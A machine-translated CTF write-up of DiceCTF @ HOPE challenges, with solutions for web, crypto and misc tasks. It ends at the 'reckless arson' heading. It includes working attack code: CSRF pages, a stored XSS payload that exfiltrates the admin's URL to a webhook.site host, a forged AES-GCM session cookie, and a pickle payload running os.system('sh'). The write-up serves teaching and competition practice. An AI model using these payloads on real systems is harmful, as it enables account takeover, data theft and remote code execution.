DiceCTF @ HOPE WriteUps


This article is automatically translated by LLM, so the translation may be inaccurate or incomplete. If you find any mistake, please let me know.
You can find the original article here.

This time, XxTSJxX and I participated in the DiceCTF @ HOPE competition (essentially redpwnCTF 2022) and achieved a good result.

web

point

package main

import (
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"strings"
)

type importantStuff struct {
	Whatpoint string `json:"what_point"`
}

func main() {
	flag, err := os.ReadFile("flag.txt")
	if err != nil {
		panic(err)
	}

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet:
			fmt.Fprint(w, "Hello, world")
			return
		case http.MethodPost:
			body, err := io.ReadAll(r.Body)
			if err != nil {
				fmt.Fprintf(w, "Something went wrong 1")
				return
			}

			if strings.Contains(string(body), "what_point") || strings.Contains(string(body), "\\") {
				fmt.Fprintf(w, "Something went wrong 2")
				return
			}

			var whatpoint importantStuff
			err = json.Unmarshal(body, &whatpoint)
			if err != nil {
				fmt.Fprintf(w, "Something went wrong 3 %s", err)
				return
			}

			if whatpoint.Whatpoint == "that_point" {
				fmt.Fprintf(w, "Congrats! Here is the flag: %s", flag)
				return
			} else {
				fmt.Fprintf(w, "Something went wrong 4 %s", whatpoint.Whatpoint)
				return
			}
		default:
			fmt.Fprint(w, "Method not allowed")
			return
		}
	})

	log.Fatal(http.ListenAndServe(":8081", nil))

}

We need to send JSON that unmarshals so that whatpoint.Whatpoint == "that_point", but the body may not contain what_point or a backslash (so \u escapes are out). The struct tag maps Whatpoint to the what_point key.

Reading the json.Unmarshal source directly, I found that it falls back to case-insensitive matching when comparing keys, so changing one letter to uppercase bypasses the check.

> curl 'https://point.mc.ax/' --data '{"what_poinT":"that_point"}'
Congrats! Here is the flag: hope{cA5e_anD_P0iNt_Ar3_1mp0rT4nT}
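The bypass can be modelled in a few lines of Python. This is only a sketch: the challenge itself is Go, and go_like_lookup is a hypothetical stand-in for the way encoding/json prefers an exact key match but also accepts a case-insensitive one.

```python
import json


def passes_filter(body: str) -> bool:
    # Mirrors the server check: reject "what_point" and any backslash.
    return "what_point" not in body and "\\" not in body


def go_like_lookup(obj: dict, field: str):
    # Hypothetical model of Go's key matching: exact match first,
    # then fall back to a case-insensitive comparison.
    if field in obj:
        return obj[field]
    for key, value in obj.items():
        if key.lower() == field.lower():
            return value
    return None


body = '{"what_poinT":"that_point"}'
value = go_like_lookup(json.loads(body), "what_point")
print(passes_filter(body), value)
```

The literal key what_point is rejected by the filter, while what_poinT passes it and still resolves to the same struct field.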

mk

The challenge is a simple service, https://mk.mc.ax/render?content=asd, that renders markdown for you. It doesn't filter HTML, so you can inject HTML directly. However, a CSP prevents straightforward XSS:

default-src 'self';base-uri 'self';frame-ancestors 'none';img-src 'none';object-src 'none';script-src 'self' 'unsafe-eval';script-src-attr 'none';style-src 'self' 'unsafe-inline'

Looking at the provided files, we know it uses MathJax 2.7.9, so I checked the official Getting Started guide and found that MathJax is initialized like this:

<script type="text/x-mathjax-config">
MathJax.Hub.Config({
  tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]}
});
</script>
<script type="text/javascript" async src="path-to-mathjax/MathJax.js?config=TeX-AMS_CHTML"></script>

The text/x-mathjax-config looks suspicious, so I modified it to:

<script type="text/x-mathjax-config">
alert(1)
</script>
<script type="text/javascript" async src="/MathJax/MathJax.js?config=TeX-AMS_CHTML"></script>

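Inserting this into /render?content=... triggered an alert, which shows that MathJax evals the contents of that script tag. The CSP allows this because MathJax.js is loaded from 'self' and script-src includes 'unsafe-eval'. The remaining task was to steal the admin bot's cookie.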

Flag: hope{make_sure_to_check_your_dependencies}

payment-pal

This is the best-designed web CTF challenge I've solved so far.

This challenge is quite complex and requires finding various vulnerabilities and chaining them together to solve it.

First, let's look at the admin bot:

// npm install puppeteer

const puppeteer = require("puppeteer");

// change these
const USERNAME = "ADMIN_ACCOUNT";
const PASSWORD = "ADMIN_PASSWORD";
const SITE = "http://paymentpal.localhost";

const visit = async (url) => {
    let browser;
    try {
        browser = await puppeteer.launch({
            headless: 'chrome',
            pipe: true,
            args: [
                "--no-sandbox",
                "--disable-setuid-sandbox",
                "--js-flags=--noexpose_wasm,--jitless",
            ],
            dumpio: true
        });

        let page = await browser.newPage();
        await page.goto(SITE, {
            waitUntil: "networkidle2"
        });

        await page.evaluate((username, password) => {
            document.querySelector("input[name=username]").value = username;
            document.querySelector("input[name=password]").value = password;
            document.querySelector("#login_btn").click();
        }, USERNAME, PASSWORD);
        page.once('dialog', async dialog => {
            await dialog.dismiss();
        });
        await page.waitForNavigation();

        // yeah, this is indeed the payment-pal website :')
        await page.waitForTimeout(1000);

        await page.evaluate(() => {
            document.querySelector("#logout_btn").click();
        });
        await page.waitForTimeout(2000);

        await page.goto(url);
        await page.waitForTimeout(10000);

        await browser.close();
        browser = null;
    } catch (err) {
        console.log(err);
    } finally {
        if (browser) await browser.close();
    }
};

visit("https://yourwebsite/payload");

The bot logs in as admin, logs out, and only then visits the URL we specify. The login and logout look like a no-op, which is confusing: by the time our URL is visited, the browser no longer holds admin credentials. So is there anything left to exploit?

The backend uses Express and GraphQL, and the database is just a simple in-memory map in JavaScript:

db.js:

const users = new Map();

const getUser = (name) => users.get(name);
const setUser = (name, data) => users.set(name, data);

(() => {
    const crypto = require("crypto");
    const sha256 = (data) => crypto.createHash('sha256').update(data).digest('hex');

    const username = `admin-` + (process.env.ADMIN_SUFFIX || crypto.randomBytes(8).toString("hex"));
    const password = process.env.ADMIN_PASSWORD || crypto.randomBytes(16).toString("hex");
    setUser(username, Object.freeze({
        username,
        password: sha256(password),
        money: 133742069,
        isAdmin: true,
        contacts: Object.freeze([])
    }));
    console.log(`created account: ${username} with password ${password}`);
})();

module.exports = {
    getUser,
    setUser
};

From auth.js, we know it uses AES-256-GCM to encrypt the username as a token and stores it in the session cookie:

const crypto = require("crypto");

const db = require("./db.js");

const KEY = crypto.randomBytes(32);

const encrypt = (data) => {
  const iv = Buffer.from(crypto.randomBytes(16));
  const cipher = crypto.createCipheriv('aes-256-gcm', KEY, iv);
  let enc = cipher.update(data, 'utf8', 'base64');
  enc += cipher.final('base64');
  return [enc, iv.toString('base64'), cipher.getAuthTag().toString('base64')].join(".");
};

const decrypt = (data) => {
  try {
    const [enc, iv, authTag] = data.split(".").map(d => Buffer.from(d, 'base64'));
    const decipher = crypto.createDecipheriv('aes-256-gcm', KEY, iv);
    decipher.setAuthTag(authTag);
    let dec = decipher.update(enc, 'base64', 'utf8');
    return dec;
  }
  catch(err) {
    return null;
  }
};

const getUser = (req) => {
  const session = req.cookies.session;
  if(!session) {
    throw new Error("You are not logged in")
  }

  const username = decrypt(session);
  if(!username) {
    throw new Error("You are not logged in");
  }
  
  let user = db.getUser(username);
  if(!user) {
    throw new Error("You are not logged in")
  }

  return user;
};

const setUser = (res, username) => {
  res.cookie("session", encrypt(username));
};

module.exports = { getUser, setUser };

AES-GCM is authenticated encryption, so we shouldn't be able to tamper with the session, right? However, this code misuses the API. Comparing it with an aes-256-gcm example for the Node.js crypto API found via Google, both call cipher.final() during encryption, but auth.js never calls decipher.final() during decryption. The authTag is only verified inside decipher.final(), and testing confirms that decryption still succeeds after the authTag is modified. Without that check, AES-GCM is equivalent to AES-CTR, so the plaintext can be changed arbitrarily by flipping ciphertext bits.

Example:

const xor = (a, b) => {
	const buf = Buffer.alloc(a.length)
	for (let i = 0; i < a.length; i++) {
		buf[i] = a[i] ^ b[i]
	}
	return buf
}

const [enc, iv, auth] = encrypt('guest').split('.')
const target = Buffer.from('admin')
const plain = Buffer.from('guest')
const enc2 = xor(Buffer.from(enc, 'base64'), xor(target, plain)).toString('base64')
console.log(decrypt([enc, iv, auth].join('.')))  // guest
console.log(decrypt([enc2, iv, auth].join('.')))  // admin

This means the decrypted username from the token can be arbitrarily modified, but we still need to know the admin username (admin-?) to get the admin account.

This changes the goal: instead of using XSS to make the admin transfer money to our account through GraphQL, we only need XSS to learn the admin username, which also makes the admin bot's logout less confusing. Assuming we have XSS, we can use history.go(-4) to return to the original page, and if the XSS runs in a new tab, we can read window.opener.location.href to get the URL. (After a successful login, the site redirects to /?message=logged in as ${username}, so the username is in the URL.)

To achieve XSS, we need to read the client-side script.js. Here are the important parts:

const $ = document.querySelector.bind(document); // imagine using jQuery...

const DENYLIST = ["__proto__", "constructor", "prototype"]; // no
const parseQs = () => {
  let obj = {};
  let pairs = location.search.slice(1).split('&').filter(Boolean);
  for (let i = 0; i < pairs.length; i++) {
    if (DENYLIST.some(key => pairs[i].includes(key))) continue;

    let parts = pairs[i].split('=');
    let m;
    if (m = /(\w+)\[(\w+)\]/.exec(decodeURIComponent(parts[0]))) {
      obj[m[1]] = obj[m[1]] || [];
      obj[m[1]][m[2]] = decodeURIComponent(parts[1]);
    } else {
      obj[decodeURIComponent(parts[0])] = decodeURIComponent(parts[1]);
    }
  }

  history.pushState(null, null, location.pathname);
  return obj;
};
let qs = parseQs();

const graphql = async (query, variables) => {
  let r;
  if (variables) {
    r = await fetch("/graphql", {
      method: "POST",
      credentials: "same-origin",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        query,
        variables
      })
    });
  } else {
    r = await fetch("/graphql?query=" + encodeURIComponent(query), {
      credentials: "same-origin"
    });
  }
  return await r.json();
};

window.onload = async () => {
  if (qs.message) {
    alert(qs.message);
    await new Promise(r => setTimeout(r, 500));
  }
  qs = null;

  let res = await graphql(`query { info { money, isAdmin } }`);
  if (res.errors) {
    // not logged in
    $("#anonymous").style.display = "block";
  } else {
    // welcome!
    let { money, isAdmin } = res.data.info;
    $("#user").style.display = "block";
    $("#money").innerText = `Money: $${money}`;

    if (isAdmin) {
      // enable WIP contacts feature
      let res = await graphql(`query { info { contacts } }`);
      if (res.errors || !res.data.info.contacts) return;
      let html = `<h3>contacts:</h3><ol>`;
      res.data.info.contacts.forEach(user =>
        html += `<li onclick="transferToUser('${user}')" style="cursor:pointer">${user}</li>`
      );
      html += `</ol>`;
      $("#contacts").innerHTML = html;
    }
  }
};

First, parseQs checks for __proto__, constructor, and prototype, but it decodes the URI component afterward, making it easy to bypass the check and perform prototype pollution. For example, the following URL makes Object.prototype.peko === 'miko' true:

https://payment-pal.mc.ax/?__%70roto__%5Bpeko%5D=miko
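Why the denylist misses this URL can be shown with a small Python model of parseQs. It is a sketch of the order of operations only (filter first, decode second); parse_pair is a hypothetical helper, not part of the challenge code.

```python
import re
from urllib.parse import unquote

DENYLIST = ["__proto__", "constructor", "prototype"]


def parse_pair(pair: str):
    # The denylist is applied to the still-encoded pair...
    if any(key in pair for key in DENYLIST):
        return None
    raw_key, _, raw_value = pair.partition("=")
    # ...and percent-decoding only happens afterwards.
    key = unquote(raw_key)
    m = re.search(r"(\w+)\[(\w+)\]", key)
    if m:
        return (m.group(1), m.group(2), unquote(raw_value))
    return (key, None, unquote(raw_value))


encoded = parse_pair("__%70roto__%5Bpeko%5D=miko")
plain = parse_pair("__proto__[peko]=miko")
print(encoded, plain)
```

The encoded pair slips past the filter and decodes to the object key __proto__ with property peko, while the plain spelling is dropped.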

However, reading further, there doesn't seem to be any prototype pollution gadget available. The most suspicious part is isAdmin, where $("#contacts").innerHTML = html; might allow XSS, but await graphql('query { info { money, isAdmin } }') returns {"data":{"info":{"money":0,"isAdmin":false}}} for a regular account, so polluting Object.prototype.isAdmin is useless.

I was reminded of a breakthrough from solving SEETF 2022 - Charlotte's Web, where I learned that prototype pollution can affect certain browser APIs, including fetch. For example, the following code successfully queries in both Chromium and Firefox:

Object.prototype.body = JSON.stringify({ query: 'query { info { username } }' })
await fetch("/graphql", {
  method: "POST",
  credentials: "same-origin",
  headers: {
    "Content-Type": "application/json"
  }
}).then(r => r.json());

However, this prototype pollution only reaches one level deep, so we can't pollute headers, and modifying method and body is therefore not an option. Looking through the fetch() options, I found the interesting cache option. With cache: 'force-cache', the browser uses a cached response whenever one is available. (In devtools, the Network tab shows whether a response came from the cache under Fulfilled by.)

Since the admin bot logs in and waits for a second before logging out, the responses for query { info { money, isAdmin } } and query { info { contacts } } should be cached. Polluting Object.prototype.cache = 'force-cache' makes the browser use the cached response, so isAdmin will be true for the admin bot!

However, the response for query { info { contacts } } will also be cached. To control contacts for XSS, we need to purge the cache. Testing revealed that directly GETting the query URL doesn't work, but CSRF POSTing the URL clears the contacts cache.

The rest is simpler. Since isAdmin now sends the browser down the if branch, controlling a contact's username gives HTML injection and therefore XSS. To control the contacts, we can use CSRF to log the admin bot into a fresh account; since we control that account, we control its contacts (alternatively, register and then CSRF addContact). This is the common Self-XSS + CSRF = XSS pattern.

However, when trying CSRF against GraphQL, GET /graphql?query=mutation { ... } fails because mutations require POST. A CSRF form can't set Content-Type to application/json, but testing shows that POST /graphql?query=mutation { ... } works, so a JSON body isn't necessary.

Complete payload to steal the admin username using XSS:

index.html:

<script>
    window.open('/main.html' + location.hash)
    history.go(-3)
</script>

This opens main.html in a new tab and then uses history.go(-3) to send the current tab back to the original https://payment-pal.mc.ax/ page, which makes it easier for main.html to control that tab once it gets XSS. The location.hash is simply passed through to main.html.

main.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		w =  window.open('/nocache.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		w = window.open('/csrf_register.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		w = window.open('/csrf_addcontact.html' + location.hash)
		await new Promise(r => setTimeout(r, 1000))
		w.close()
		location = `${base}/?__%70roto__%5Bcache%5D=force-cache`
	}
</script>

Using location.hash to select the base URL is just for convenience during localhost testing. The main part opens three pages in sequence: clearing the contacts cache, CSRF registering, and CSRF adding contact, then redirects itself to payment-pal while polluting cache: 'force-cache'.

nocache.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		const u = `${base}/graphql?query=query%20%7B%20info%20%7B%20contacts%20%7D%20%7D`
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This POSTs the contacts query to clear the cache.

csrf_register.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
        const user = Math.random().toString(36)
        const pass = Math.random().toString(36)
		const u =
			`${base}/graphql?query=` +
			encodeURIComponent(`mutation { register(username: ${JSON.stringify(user)}, password: ${JSON.stringify(pass)}) { username } }`)
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This uses CSRF to register a random account, which serves as the Self-XSS account.

csrf_addcontact.html:

<script>
	const base = ['http://localhost:8080', 'https://payment-pal.mc.ax'][location.hash.slice(1)]
	window.onload = async () => {
		const xss = `<img src onerror="window.opener.history.go(-2);setTimeout(()=>{
			fetch('https://webhook.site/6cc46cc8-91a2-4af0-ad21-4d172e924df3?xss='+encodeURIComponent(window.opener.location.href), {mode:'no-cors'})
		},1000)">`
		const u =
			`${base}/graphql?query=` +
			encodeURIComponent(`mutation { addContact(username: ${JSON.stringify(xss)}){ username } }`)
		const f = document.createElement('form')
		f.method = 'POST'
		f.action = u
		document.body.appendChild(f)
		f.submit()
	}
</script>

This uses CSRF to call addContact and store the XSS payload in the DB. The XSS payload moves the history of the original tab (login + logout + index.html) back by two entries, then reads its href to get the page URL. On the remote instance, I received:

https://payment-pal.mc.ax/?message=logged%20in%20as%20admin-dicegang_pp_user

So, the admin username is admin-dicegang_pp_user. Using the AES-GCM bug, we can generate a token with the same username:

// first register an account with username aaaaaaaaaaaaaaaaaaaaaa, and grab its token
const [enc, iv, auth] = 'JOqjWwyEnD+62ER1kFLOaS+Uz2f4Xg==.tx6orPNKYjUQ2VpYf9GtKA==.vDV0+uV+9dqXwsAWNYywNA=='.split('.')
const target = Buffer.from('admin-dicegang_pp_user')
const plain = Buffer.from('a'.repeat(22))
const enc2 = xor(Buffer.from(enc, 'base64'), xor(target, plain)).toString('base64')
console.log([enc2, iv, auth].join('.'))
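As a cross-check, the same forgery can be reproduced in Python using only the token values quoted in this writeup. The result should be the session cookie that appears in the curl command for the transfer.

```python
import base64


def xor(a: bytes, b: bytes) -> bytes:
    # Byte-wise XOR of two equal-length byte strings.
    return bytes(x ^ y for x, y in zip(a, b))


# Token of the account registered as 22 'a' characters (from the writeup).
token = "JOqjWwyEnD+62ER1kFLOaS+Uz2f4Xg==.tx6orPNKYjUQ2VpYf9GtKA==.vDV0+uV+9dqXwsAWNYywNA=="
enc_b64, iv_b64, tag_b64 = token.split(".")

known = b"a" * 22
target = b"admin-dicegang_pp_user"

# CTR-style malleability: ciphertext XOR (old plaintext XOR new plaintext).
forged_enc = xor(base64.b64decode(enc_b64), xor(known, target))
forged = ".".join([base64.b64encode(forged_enc).decode(), iv_b64, tag_b64])
print(forged)
```

The IV and auth tag are reused unchanged, which only works because the server never verifies the tag.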

Then, transfer money to our account:

curl 'https://payment-pal.mc.ax/graphql' -G --data-urlencode 'query=mutation { transfer(recipient: "pekomiko35", amount: 133742069) { username } }' -H 'Cookie: session=JO+vUwPImTe43EJ1n1TweD6q23X8TQ==.tx6orPNKYjUQ2VpYf9GtKA==.vDV0+uV+9dqXwsAWNYywNA==' -X POST

Finally, run query { flag } under our account to get the flag.

Flag: hope{pp=payment-pal=prototype-pollution!!!}

Author writeup: DiceCTF @ HOPE - web/payment-pal writeup

crypto

reverse-rsa

#!/usr/local/bin/python

import re
from Crypto.Util.number import isPrime, GCD

flag_regex = rb"hope{[a-zA-Z0-9_\-]+}"

with open("ciphertext.txt", "r") as f:
	c = int(f.read(), 10)

print(f"Welcome to reverse RSA! The encrypted flag is {c}.  Please provide the private key.")

p = int(input("p: "), 10)
q = int(input("q: "), 10)
e = int(input("e: "), 10)

N = p * q
phi = (p-1) * (q-1)

if (p < 3) or not isPrime(p) or (q < 3) or not isPrime(q) or (e < 2) or (e > phi) or GCD(p,q) > 1 or GCD(e, phi) != 1:
	print("Invalid private key")
	exit()


d = pow(e, -1, phi)
m = pow(c, d, N)

m = int.to_bytes(m, 256, 'little')
m = m.strip(b"\x00")

if re.fullmatch(flag_regex, m) is not None:
	print("Clearly, you must already know the flag!")

	with open('flag.txt','rb') as f:
		flag = f.read()
		print(flag.decode())

else:
	print("hack harder")

In this challenge the flag was encrypted with an unknown RSA public key, giving $c$, and we must supply our own key $(p, q, e)$ such that $m' \equiv c^d \pmod{n}$ matches the regex hope{[a-zA-Z0-9_\-]+}.

The solution is to pick any $m'$ that matches the regex, such as hope{a} (mind the endianness), which turns the problem into a discrete logarithm: find $d$ with $c^d \equiv m' \pmod{n}$. We therefore need $p-1$ and $q-1$ to be smooth enough, solve the dlog modulo each prime, and combine the results with CRT to get $d$, from which the required $e \equiv d^{-1} \pmod{\varphi(n)}$ follows.

from Crypto.Util.number import *

c = 7146993245951509380139759140890681816862856635262037632915667109712467317954902955151177421740994622238561522690931235839733579166121631742096762557444153806131985279962646477997889661633938981817306610901055296705982494607773446985300816341071922739788638126631520234249358834592814880445497817389957300553660499631838091201561728727996660871094966330045071879490277901216751327226984526095495604592577841120425249633624459211547984305731778854596177467026282357094690700361174790351699376317810120824316300666128090632100150965101285647544696152528364989155735157261219949095760495520390692941417167332814540685297
m = bytes_to_long(b"hope{a}"[::-1])


def gen():
    while True:
        b = 64
        n = 4
        ps = [getPrime(b // n) for _ in range(n)]
        p = 2 * product(ps) + 1
        if isPrime(p):
            return p


while True:
    try:
        p = gen()
        q = gen()
        dp = GF(p)(m).log(c)
        dq = GF(q)(m).log(c)
        d = crt([ZZ(dp), ZZ(dq)], [p - 1, q - 1])
        e = inverse_mod(d, (p - 1) * (q - 1))
        m = power_mod(c, d, p * q)
    except Exception:
        continue
    print(p)
    print(q)
    print(e)
    print(int.to_bytes(int(m), 256, 'little'))
    break
"""
18237507977115134399
13539415005905881139
201049869065984997914383873658228289079
"""
# hope{successful_decryption_doesnt_mean_correct_decryption_0363f29466b883edd763dc311716194d37dff5cd93cd4f1b4ac46152f4f9}
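The endianness remark can be checked in plain Python. The sketch below mirrors the server's decoding step (to_bytes with 'little', then stripping zero bytes) and shows that the target integer is the little-endian reading of hope{a}, which is the same as bytes_to_long of the reversed string used in the solver.

```python
import re

FLAG_REGEX = rb"hope{[a-zA-Z0-9_\-]+}"
target = b"hope{a}"

# The server decodes m as little-endian, so encode the target the same way.
m_int = int.from_bytes(target, "little")

# Same conversion the server applies to pow(c, d, N).
recovered = m_int.to_bytes(256, "little").strip(b"\x00")
print(m_int, recovered)
```

Using the big-endian integer instead would make the server see the bytes reversed, which does not match the regex.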

small-fortune

from Crypto.Util.number import *
from gmpy2 import legendre

flag = bytes_to_long(open("flag.txt", "rb").read())

p, q = getPrime(256), getPrime(256)
n = p * q

x = getRandomRange(0, n)
while legendre(x, p) != -1 or legendre(x, q) != -1:
    x = getRandomRange(0, n)

def gm_encrypt(msg, n, x):
    y = getRandomRange(0, n)
    enc = []
    while msg:
        bit = msg & 1
        msg >>= 1
        enc.append((pow(y, 2) * pow(x, bit)) % n)
        y += getRandomRange(1, 2**48)
    return enc

print("n =", n)
print("x =", x)
print("enc =", gm_encrypt(flag, n, x))

First, we have a 512-bit $n = pq$ (two 256-bit primes) and a random number $x$ as the public key (the requirement that $x$ be a quadratic non-residue seems unnecessary here (?)). The encryption process generates an unknown random number $y$, then encrypts bit by bit:

$$c_i \equiv y_i^2 x^{b_i} \pmod{n}$$

where $y_0 = y$, $y_i = y_{i-1} + d_i$, and each $d_i$ is a random number below $2^{48}$.

Assuming flag.txt contains a flag of the form hope{...} without a trailing newline, the last byte is } (0x7d = 01111101) and the bits are emitted least significant first, so $b_0 = 1, b_1 = 0$. From this, we can derive two equations:

$$
\begin{aligned}
c_0 &\equiv y^2 x^{b_0} \equiv y^2 x \pmod{n} \\
c_1 &\equiv (y+d_1)^2 x^{b_1} \equiv (y+d_1)^2 \pmod{n}
\end{aligned}
$$

Rearranging gives two polynomials $f(y, d_1), g(y, d_1)$. Taking the resultant gives $h = \operatorname{Res}_y(f, g)$, a degree-4 polynomial in $d_1$. Since $48 \times 4 < 512$, i.e. $d_1 < n^{1/4}$, Coppersmith's method can find $d_1$. Substituting $d_1$ back into $f, g$ gives two polynomials in $y$, and their gcd reveals $y$.
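The elimination of $y$ can also be worked out by hand, which makes the degree-4 claim easy to see. Writing $a \equiv c_0 x^{-1} \pmod{n}$ (a shorthand introduced here, assuming $x$ is invertible modulo $n$):

$$
\begin{aligned}
f = x y^2 - c_0 = 0 &\;\Rightarrow\; y^2 \equiv a \pmod{n} \\
g = (y + d_1)^2 - c_1 = 0 &\;\Rightarrow\; 2 d_1 y \equiv c_1 - a - d_1^2 \pmod{n} \\
\text{squaring and using } y^2 \equiv a &\;\Rightarrow\; (d_1^2 + a - c_1)^2 - 4 a d_1^2 \equiv 0 \pmod{n}
\end{aligned}
$$

The last line is $\operatorname{Res}_y(f, g)$ up to the factor $x^2$. Once $d_1$ is known, the second line also gives $y \equiv (c_1 - a - d_1^2)(2 d_1)^{-1} \pmod{n}$ directly, which is the linear factor the gcd computation recovers.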

With $y$ known, the rest is easier. Assuming we don't know $b_1$ (or $d_1$), one of the following two congruences must hold:

$$
\begin{aligned}
c_1 &\equiv (y+d_1)^2 x^0 \pmod{n} \\
c_1 &\equiv (y+d_1)^2 x^1 \pmod{n}
\end{aligned}
$$

Here $y$ is known and $d_1$ is small, so we can run Coppersmith on both polynomials and see which one has a root below $2^{48}$, which reveals whether $b_1$ is $0$ or $1$. The remaining bits can be deduced in the same way.

with open("output.txt") as f:
    exec(f.read())


def resultant(f1, f2, var):
    return f1.sylvester_matrix(f2, var).det()


# assuming ending with `}` = 01111101
P = PolynomialRing(Zmod(n), "y,d")
y, d = P.gens()
f = y ^ 2 * x - enc[0]
g = (y + d) ^ 2 - enc[1]
h = resultant(f, g, y).univariate_polynomial()
d = h.monic().small_roots()[1]


P = PolynomialRing(Zmod(n), "y")
y = P.gen()
f = y ^ 2 * x - enc[0]
g = (y + d) ^ 2 - enc[1]
while g:
    f, g = g, f % g
y = -f[0] / f[1]
assert y ^ 2 * x == enc[0]


bits = [1]
for e in enc[1:]:
    P = PolynomialRing(Zmod(n), "d")
    d = P.gen()
    f = (y + d) ^ 2 * x - e
    g = (y + d) ^ 2 - e
    rs1 = f.monic().small_roots()
    rs2 = g.monic().small_roots()
    if rs1:
        bits += [1]
        d = rs1[0]
    elif rs2:
        bits += [0]
        d = rs2[0]
    else:
        raise Exception("nope")
    y += d
    print(y)
    print(bits)
bits += [0]

from pwn import unbits

print(unbits(bits[::-1]))
# hope{r4nd0m_sh0uld_b3_truly_r4nd0m_3v3ry_t1m3_sh0uld_1t_n0t?}
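The starting assumption $b_0 = 1, b_1 = 0$ depends on the bit order used by gm_encrypt. A short Python check, using a placeholder flag (hypothetical, only the trailing } matters), reproduces the msg & 1 / msg >>= 1 loop from the challenge:

```python
def lsb_first_bits(data: bytes, count: int) -> list:
    # int.from_bytes(..., "big") matches bytes_to_long in the challenge.
    msg = int.from_bytes(data, "big")
    bits = []
    for _ in range(count):
        bits.append(msg & 1)  # same extraction order as gm_encrypt
        msg >>= 1
    return bits


# Placeholder flag; only the final '}' (0x7d) affects the first 8 bits.
first_bits = lsb_first_bits(b"hope{placeholder}", 8)
print(first_bits)
```

The first eight encrypted bits are therefore the bits of 0x7d read from the least significant end, starting with 1 and 0.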

Note: The $n$ in this challenge is only 512 bits, so factoring it with FaaS and then using Rabin decryption to find $y$ might also be possible.

misc

arson

This challenge is the broken version of reckless arson. I found the intended solution first and only noticed the unintended one later.

#!/usr/local/bin/python

import torch
import pickle
import base64
import secrets
import os

class UnpicklerWrapper:
    def find_class(self, module, name):
        if module+"."+name in (
            "builtins.set",
            "collections.OrderedDict",
            "torch.nn.modules.activation.LogSigmoid",
            "torch.nn.modules.activation.LogSoftmax",
            "torch.nn.modules.activation.ReLU",
            "torch.nn.modules.activation.Sigmoid",
            "torch.nn.modules.activation.Softmax",
            "torch.nn.modules.batchnorm.BatchNorm1d",
            "torch.nn.modules.batchnorm.BatchNorm2d",
            "torch.nn.modules.batchnorm.BatchNorm3d",
            "torch.nn.modules.conv.Conv1d",
            "torch.nn.modules.conv.Conv2d",
            "torch.nn.modules.conv.ConvTranspose1d",
            "torch.nn.modules.conv.ConvTranspose2d",
            "torch.nn.modules.dropout.Dropout2d",
            "torch.nn.modules.dropout.Dropout3d",
            "torch.nn.modules.flatten.Flatten",
            "torch.nn.modules.linear.Linear",
            "torch.nn.modules.loss.BCELoss",
            "torch.nn.modules.loss.BCEWithLogitsLoss",
            "torch.nn.modules.loss.CrossEntropyLoss",
            "torch.nn.modules.loss.L1Loss",
            "torch.nn.modules.loss.MSELoss",
            "torch.nn.modules.pooling.AvgPool2d",
            "torch.nn.modules.pooling.MaxPool2d",
            "torch._utils._rebuild_parameter",
            "torch._utils._rebuild_tensor_v2",
            "torch.Size",
            "torch.BFloat16Storage",
            "torch.BoolStorage",
            "torch.CharStorage",
            "torch.ComplexDoubleStorage",
            "torch.ComplexFloatStorage",
            "torch.HalfStorage",
            "torch.IntStorage",
            "torch.LongStorage",
            "torch.QInt32Storage",
            "torch.QInt8Storage",
            "torch.QUInt8Storage",
            "torch.ShortStorage",
            "torch.storage._StorageBase",
            "torch.ByteStorage",
            "torch.DoubleStorage",
            "torch.FloatStorage",
            "torch._C.HalfStorageBase",
            "torch._C.QInt32StorageBase",
            "torch._C.QInt8StorageBase",
            "torch.storage._TypedStorage",
        ):
            return super().find_class(module, name)
        else:
            raise Exception("Hacking detected!")

# replace find_class with our safe one
_load_co_consts = list(torch.serialization._load.__code__.co_consts)
unpickler_co_consts = list(_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_load_co_consts[7] = _load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._load.__code__ = torch.serialization._load.__code__.replace(co_consts=tuple(_load_co_consts))
_legacy_load_co_consts = list(torch.serialization._legacy_load.__code__.co_consts)
unpickler_co_consts = list(_legacy_load_co_consts[7].co_consts)
unpickler_co_consts[1] = UnpicklerWrapper.find_class.__code__
_legacy_load_co_consts[7] = _legacy_load_co_consts[7].replace(co_consts=tuple(unpickler_co_consts))
torch.serialization._legacy_load.__code__ = torch.serialization._legacy_load.__code__.replace(co_consts=tuple(_legacy_load_co_consts))

try:
    with open(filename := "/tmp/"+secrets.token_hex(), "wb") as f:
        data = base64.b64decode(input("Enter base64-encoded model: "))
        if len(data) > 1000000: raise Exception("Model too big")
        f.write(data)

    model = torch.load(filename)

    # Machine learning is magic!
    model.solve_world_hunger()
finally:
    os.remove(filename)

We need to provide a fake model to torch.load for RCE. First, read the torch.load code (in serialization.py). It has new and old formats implemented in _load and _legacy_load, respectively, and this unintended solution involves _legacy_load.

Inside it there is an UnpicklerWrapper class whose original find_class would easily give RCE, but arson.py patches co_consts to swap in the restricted find_class shown above, so direct RCE through it is blocked...?

Reading further, we see magic_number = pickle_module.load(f, **pickle_load_args), where pickle_module is Python's pickle. So, providing a simple os.system('sh') pickle achieves RCE.
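A minimal sketch of such a payload, assuming (as described above) that the uploaded file is a bare pickle that ends up in the plain pickle load. Exploit is a hypothetical class name; the block only builds and prints the base64 string and never unpickles it.

```python
import base64
import os
import pickle


class Exploit:
    # __reduce__ tells pickle to call os.system("sh") when the object is loaded.
    def __reduce__(self):
        return (os.system, ("sh",))


# Serialize only; loading this payload would spawn a shell.
payload = pickle.dumps(Exploit())
encoded = base64.b64encode(payload).decode()
print(encoded)
```

The printed string is what would be pasted at the "Enter base64-encoded model" prompt.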

reckless arson

